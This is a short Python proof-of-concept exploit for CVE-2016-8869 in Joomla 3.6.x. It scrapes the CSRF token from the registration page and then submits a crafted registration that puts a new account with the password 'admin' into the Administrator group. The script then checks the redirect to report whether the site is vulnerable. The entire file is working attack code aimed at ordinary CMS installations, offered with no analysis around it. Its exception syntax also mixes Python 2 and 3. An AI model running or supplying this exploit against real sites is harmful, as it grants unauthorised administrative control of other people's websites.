# coding: utf-8
# CVE-2016-8869
# author: Anka9080

import re
import requests
import random

def extract_token(resp):
	match = re.search(r'name="([a-f0-9]{32})" value="1"', resp.text, re.S)
	if match is None:
		print("[!] Cannot find CSRF token")
		return None
	print('[*] Your token is '+match.group(1))
	return match.group(1)

def poc(target):
    headers = {
        "Content-Type":"application/x-www-form-urlencoded"
    }
    proxies = {
        'http':'127.0.0.1:8080'
    }
    s = requests.Session()
    r = s.get(target+'index.php/component/users/?task=registration.register',proxies=proxies) # get cookie
    token = extract_token(r)
    # print r.headers
    randstr = '_'+str(random.randint(1,10000))
    # build post data
    print('[*] create user: {}'.format('admin'+randstr))
    data = {
        # User object
        'task':(None,'user.register'),
        'option':(None,'com_users'),
        'user[name]': (None,'admin'+randstr),
        'user[username]': (None,'admin'+randstr),
        'user[password1]': (None,'admin'),
        'user[password2]': (None,'admin'),
        'user[email1]': (None,'admin'+randstr +'@xx.com'),
        'user[email2]': (None,'admin'+randstr +'@xx.com'),
        'user[groups][]': (None,'7'),	#  Administrator!
        token:(None,'1')
    }
    try:
        r = s.post(target+'index.php/component/users/?task=registration.register',files=data,proxies=proxies,allow_redirects=False)
        if 'index.php?option=com_users&view=registration' in r.headers['location']:
            print('[+] {} is vul !'.format(target))
            return True
    except Exception , e:
        print('[!] err: {}'.format(str(e)))

    return False


if __name__ == '__main__':
    poc('http://localhost/joomla/Joomla_3.6.3-Stable-Full_Package/')

